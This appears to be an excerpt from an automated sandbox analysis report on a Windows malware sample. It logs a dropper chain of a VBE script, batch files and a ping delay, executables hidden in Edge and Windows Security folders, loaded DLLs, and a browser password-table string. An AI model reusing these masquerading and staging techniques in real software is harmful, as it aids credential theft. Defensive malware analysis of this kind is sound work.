                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exeFile read: C:\Windows\win.iniJump to behavior
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                    Source: Jy8UMgCbf3.9.dr, iQ07yOc3Yu.9.dr, l5Un2quyrK.9.dr, CljGS0qeQ1.9.dr, 9Eu6lHwjMM.9.dr, Duj9YBd7aa.9.dr, 6osabqjFQK.9.dr, Z13stlPtuJ.9.dr, 36ockHqNHS.9.dr, MRX210yq0f.9.dr, pyj91tC4RS.9.dr, o2cUFO2Ccr.9.dr, RRnEXNYsau.9.dr, FItRauZ3Tr.9.dr, nSeo4ql17G.9.dr, jZOQDTUZUv.9.dr, 0RYwgN508w.9.dr, yi6b1ILNg4.9.dr, VYB0a4uwNC.9.dr, Yjc776KY3F.9.dr, z5cBLlsr95.9.dr, GBxiYBd1uh.9.dr, umFMX3ei74.9.dr, 1I5Wrg3tLj.9.dr, EwWRb1qlu8.9.dr, s8qJR17h0m.9.dr, sbWv71Pmx6.9.dr, IKln6QMVEN.9.dr, NOlYAWesyP.9.dr, cicIpTSZHK.9.dr, QyiKhqXDJh.9.dr, LSFlfqGJR1.9.dr, 9ijuX1eNzG.9.dr, VIQd9S20Vy.9.dr, adLqhOmmDp.9.dr, aNtUO1yRIY.9.dr, rQtHfgKFml.9.dr, oomjhqf1ph.9.dr, UcjWfYLwTs.9.dr, FQWVwwugbs.9.dr, bUK1sJKGeT.9.dr, X1ITOcCAlk.9.dr, 9DoZZDrbEC.9.dr, Nvt7Bvr3kj.9.dr, tuNpGwk1kM.9.dr, ItC6u6iT7A.9.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                                    Source: 8k1e14tjcx.exeReversingLabs: Detection: 65%
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exeFile read: C:\Users\user\Desktop\8k1e14tjcx.exeJump to behavior
                                    Source: unknownProcess created: C:\Users\user\Desktop\8k1e14tjcx.exe "C:\Users\user\Desktop\8k1e14tjcx.exe"
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ChainagentComponent\PWC9d9T0TgxIE17d8kEvKaBzSy5sS4bSkqUfKmaENJQQSQ4ECN.vbe"
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ChainagentComponent\q14QT1c6LK4xpgG0MrqndXYweJYHdEecuYXEv1hUkMNQcqj9DhhAaajtNw.bat" "
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\ChainagentComponent\ChainFontruntimeCrt.exe "C:\ChainagentComponent/ChainFontruntimeCrt.exe"
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\KC0FFSqemJ.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe "C:\Program Files (x86)\microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe"
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ChainagentComponent\PWC9d9T0TgxIE17d8kEvKaBzSy5sS4bSkqUfKmaENJQQSQ4ECN.vbe" Jump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ChainagentComponent\q14QT1c6LK4xpgG0MrqndXYweJYHdEecuYXEv1hUkMNQcqj9DhhAaajtNw.bat" "Jump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\ChainagentComponent\ChainFontruntimeCrt.exe "C:\ChainagentComponent/ChainFontruntimeCrt.exe"Jump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\KC0FFSqemJ.bat" Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhostJump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe "C:\Program Files (x86)\microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe" Jump to behavior
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exeSection loaded: dxgidebug.dllJump to behavior
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exeSection loaded: sfc_os.dllJump to behavior
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exeSection loaded: dwmapi.dllJump to behavior
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exeSection loaded: riched20.dllJump to behavior
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exeSection loaded: usp10.dllJump to behavior
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exeSection loaded: msls31.dllJump to behavior
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exeSection loaded: windowscodecs.dllJump to behavior
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exeSection loaded: textshaping.dllJump to behavior
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exeSection loaded: textinputframework.dllJump to behavior
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exeSection loaded: coreuicomponents.dllJump to behavior
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exeSection loaded: coremessaging.dllJump to behavior
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exeSection loaded: policymanager.dllJump to behavior
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exeSection loaded: msvcp110_win.dllJump to behavior
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exeSection loaded: pcacli.dllJump to behavior
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exeSection loaded: mpr.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeSection loaded: version.dllJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeSection loaded: ktmw32.dllJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeSection loaded: dlnashext.dllJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeSection loaded: wpdshext.dllJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                                    Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Windows\System32\chcp.comSection loaded: ulib.dllJump to behavior
                                    Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dllJump to behavior
                                    Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
                                    Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
                                    Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dllJump to behavior
                                    Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dllJump to behavior
                                    Source: C:\Windows\System32\PING.EXESection loaded: fwpuclnt.dllJump to behavior
                                    Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dllJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeSection loaded: ktmw32.dllJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeSection loaded: wbemcomn.dllJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeSection loaded: iphlpapi.dllJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeSection loaded: dnsapi.dllJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeSection loaded: dhcpcsvc.dllJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeSection loaded: winnsi.dllJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeSection loaded: rasapi32.dllJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeSection loaded: rasman.dllJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeSection loaded: rtutils.dllJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeSection loaded: mswsock.dllJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeSection loaded: winhttp.dllJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeSection loaded: rasadhlp.dllJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeSection loaded: fwpuclnt.dllJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeSection loaded: winmm.dllJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeSection loaded: winmmbase.dllJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeSection loaded: mmdevapi.dllJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeSection loaded: devobj.dllJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeSection loaded: ksuser.dllJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeSection loaded: avrt.dllJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeSection loaded: audioses.dllJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeSection loaded: powrprof.dllJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeSection loaded: umpdc.dllJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeSection loaded: msacm32.dllJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeSection loaded: midimap.dllJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeSection loaded: dwrite.dllJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeSection loaded: windowscodecs.dllJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeSection loaded: dpapi.dllJump to behavior
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                                    Source: Window RecorderWindow detected: More than 3 window changes detected
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeDirectory created: C:\Program Files\Windows Security\BrowserCore\en-US\yeeQesPXxpnDuwPWqTnUoVbi.exeJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeDirectory created: C:\Program Files\Windows Security\BrowserCore\en-US\db08104604e511Jump to behavior
                                    Source: 8k1e14tjcx.exeStatic file information: File size 2365778 > 1048576
                                    Source: 8k1e14tjcx.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                                    Source: 8k1e14tjcx.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                                    Source: 8k1e14tjcx.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                                    Source: 8k1e14tjcx.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                    Source: 8k1e14tjcx.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
